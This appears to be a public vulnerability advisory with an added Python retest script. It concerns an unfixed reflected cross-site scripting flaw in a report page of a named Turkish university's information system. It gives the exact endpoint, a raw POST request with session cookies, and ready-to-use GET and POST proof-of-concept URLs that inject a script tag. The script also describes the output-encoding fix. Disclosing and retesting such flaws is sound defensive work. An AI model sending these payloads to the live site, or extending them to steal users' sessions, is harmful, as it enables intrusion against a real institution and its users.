ÇANAKKALE ONSEKİZ MART ÜNİVERSİTESİ Cross Site Scripting

2020.01.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Name: http://bys.comu.edu.tr/ Cross-site Scripting Vulnerabilities in ERPNext
Vendor Homepage: http://bys.comu.edu.tr/
Vulnerability Type: Reflected Cross-site Scripting
Severity: High
Status: Not fixed

----------------------------------------------------------------------

Request Headers

POST /cdsp/raporlar/rapor_hftdrsprg.php HTTP/1.1
Content-Length: 114
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=b74d51311432faca30c286e8b1f623d7; ets_ci_sessions=B2cCbgQ3CTUGLwIjUzoJOQE1UTkEc1VyVzRfdFQlBzhSbVM0AVoFbw9qVyNWagVwAWlXNgBhADsGIFIzVjAGYAptATwDMgZnUDNUOFBiDTgHMgJtBDoJOQZgAmdTMwlpATRRZwRoVWVXZ18%2FVGIHaFJnU2MBPAUyD29XI1ZqBXABaVc0AGMAOwYgUmlWcwYNCm0BPQNlBiJQZVQuUCcNLAc9AicEOQk%2BBmYCalMiCTwBM1EtBGBVL1dgXzBUZwd%2FUjNTbgEzBSQPNVdyVmsFMgFjVz8AcQB0BnFSZVZxBg0KbQE%2BA2QGPlB0VH9Qbw19BzwCYQQzCTUGdgIdU28JcgFsUW8EPVVgV35fMlR4B2FSIlNyAWYFaQ9jV3FWMAV3ATpXZwA%2FAGQGOVIgVk4GAQpFARwDIQZpUC5UbVBvDS4HUQI9BG0JawY7AidTcwkoAUtRVwRxVTdXf182VG0Hc1I5UykBPwU3Dz1XO1ZzBW8BMld2ACcAXgZjUmNWdwY7CnoBMAN1BilQIlRmUCcNNAc3AmQEOQktBmUCZVM3CTABMVE7BGlVNVdmXzBUdAdqUn8%3D
Host: bys.comu.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

----------------------------------------------------------------------

Request body / payload (alert here). The value of the sinif parameter is echoed into the HTML response without output encoding, so the injected script runs in the bys.comu.edu.tr origin; alert(document.domain) is the proof of execution:

bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E

----------------------------------------------------------------------

Full link. The same parameters are also accepted in the query string, so a plain GET reproduces the issue:

http://bys.comu.edu.tr//cdsp/raporlar/rapor_hftdrsprg.php?bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E
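Added example for this advisory (not code from cxsecurity.com, the reporter, or the bys.comu.edu.tr application): it rebuilds the request above against the sinif parameter of /cdsp/raporlar/rapor_hftdrsprg.php, in both the POST and GET forms the advisory shows, and classifies a response body as vulnerable (payload echoed verbatim), fixed (payload echoed HTML-encoded) or not reflected. The two response bodies are constructed for the example; the real page's markup is not known from the advisory. The host, path and parameters come from the advisory; everything else is an assumption.

```python
# Added example; not the advisory's or the application's own code.
# Reproduces the advisory's request and checks whether a response still
# reflects the `sinif` payload unencoded. Sample responses are constructed.
import html
from urllib.parse import urlencode

HOST = "bys.comu.edu.tr"
PATH = "/cdsp/raporlar/rapor_hftdrsprg.php"
PAYLOAD = "<script>alert(document.domain);</script>"
# Same three parameters as the advisory; only `sinif` carries the payload.
PARAMS = {"bol_kodu": "12312", "fak_kodu": "", "sinif": PAYLOAD}


def build_query() -> str:
    """Form-encode PARAMS. Leaving ( ) / ; unescaped reproduces the advisory's
    query string byte for byte; a server decodes either form identically."""
    return urlencode(PARAMS, safe="()/;")


def build_request(method: str = "GET") -> str:
    """Raw HTTP/1.1 request text. The advisory shows the parameters reaching
    the script both as a POST form body and as a GET query string."""
    query = build_query()
    if method == "POST":
        return (
            f"POST {PATH} HTTP/1.1\r\n"
            f"Host: {HOST}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(query)}\r\n"
            f"\r\n{query}"
        )
    return f"GET {PATH}?{query} HTTP/1.1\r\nHost: {HOST}\r\n\r\n"


def escape_for_html(value: str) -> str:
    """Output encoding a fixed page should apply before echoing `sinif` into
    an HTML text node or quoted attribute: the Python equivalent of PHP's
    htmlspecialchars($value, ENT_QUOTES, 'UTF-8'). (Python emits &#x27; for a
    single quote where PHP emits &#039;; both are safe.)"""
    return html.escape(value, quote=True)


def classify_response(body: str) -> str:
    """'vulnerable' if the raw payload is echoed back (the script would run in
    the bys.comu.edu.tr origin), 'fixed' if only its encoded form appears,
    otherwise 'not reflected'."""
    if PAYLOAD in body:
        return "vulnerable"
    if escape_for_html(PAYLOAD) in body:
        return "fixed"
    return "not reflected"


# Constructed sample responses (not captured from the real server).
VULNERABLE_RESPONSE = (
    "<html><body><h2>Report</h2>"
    "<p>Class: " + PAYLOAD + "</p>"
    "</body></html>"
)
FIXED_RESPONSE = (
    "<html><body><h2>Report</h2>"
    "<p>Class: " + escape_for_html(PAYLOAD) + "</p>"
    "</body></html>"
)

if __name__ == "__main__":
    print(build_request("GET"))
    for name, body in (("vulnerable", VULNERABLE_RESPONSE), ("fixed", FIXED_RESPONSE)):
        print(name, "->", classify_response(body))
```

The check is specific to the context the advisory demonstrates, a reflection into HTML body text: if the value were echoed inside an attribute or a script block, a payload that needs no angle brackets (quote-breakout or JavaScript-string escape) would pass this test and still execute, so a retest after a fix should cover the actual reflection context, not only this payload.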


Copyright 2022, cxsecurity.com